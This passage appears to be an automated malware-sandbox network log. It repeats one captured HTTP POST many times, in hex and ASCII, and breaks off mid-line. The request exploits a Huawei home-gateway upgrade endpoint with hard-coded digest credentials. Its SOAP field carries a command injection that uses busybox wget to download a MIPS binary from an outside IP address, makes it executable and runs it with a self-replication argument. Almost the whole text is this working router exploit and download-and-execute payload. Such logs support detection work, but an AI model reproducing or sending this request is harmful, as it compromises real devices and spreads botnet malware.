52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 